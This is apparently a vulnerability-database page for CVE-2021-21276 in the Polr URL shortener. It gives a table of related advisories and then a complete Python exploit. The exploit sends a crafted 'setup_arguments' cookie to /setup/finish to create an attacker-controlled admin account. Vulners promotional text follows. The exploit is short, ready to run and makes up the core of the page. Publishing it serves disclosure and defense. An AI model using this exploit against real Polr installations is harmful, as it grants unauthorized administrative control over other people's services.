| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| POLR URL 2.3.0 - Shortener Admin Account Takeover Exploit | 6 Apr 202300:00 | – | zdt | |
| CVE-2021-21276 | 1 Feb 202119:25 | – | circl | |
| Cydrobolt Polr Security Vulnerability | 1 Feb 202100:00 | – | cnnvd | |
| CVE-2021-21276 | 1 Feb 202100:00 | – | cve | |
| CVE-2021-21276 Privilege escalation in Polr | 1 Feb 202100:00 | – | cvelist | |
| CVE-2021-21276 | 1 Feb 202115:15 | – | nvd | |
| POLR URL 2.3.0 Shortener Admin Takeover | 6 Apr 202300:00 | – | packetstorm | |
| Code injection | 1 Feb 202115:15 | – | prion | |
| PT-2021-14382 · Polr · Polr | 1 Feb 202100:00 | – | ptsecurity | |
| CVE-2021-21276 | 22 May 202521:32 | – | redhatcve |
# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover
# Date: 2021-02-01
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>
# Vendor Homepage: -
# Software Link: https://github.com/cydrobolt/polr
# Version: < 2.3.0
# Tested on: Linux
# CVE : CVE-2021-21276
import json
import requests
payload = {
'acct_username': 'admin',
'acct_password': 'password',
'acct_email': '[email protected]',
'setup_auth_key': True,
}
r = requests.get('http://localhost/setup/finish',
cookies={'setup_arguments': json.dumps(payload)})
print(r.text)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation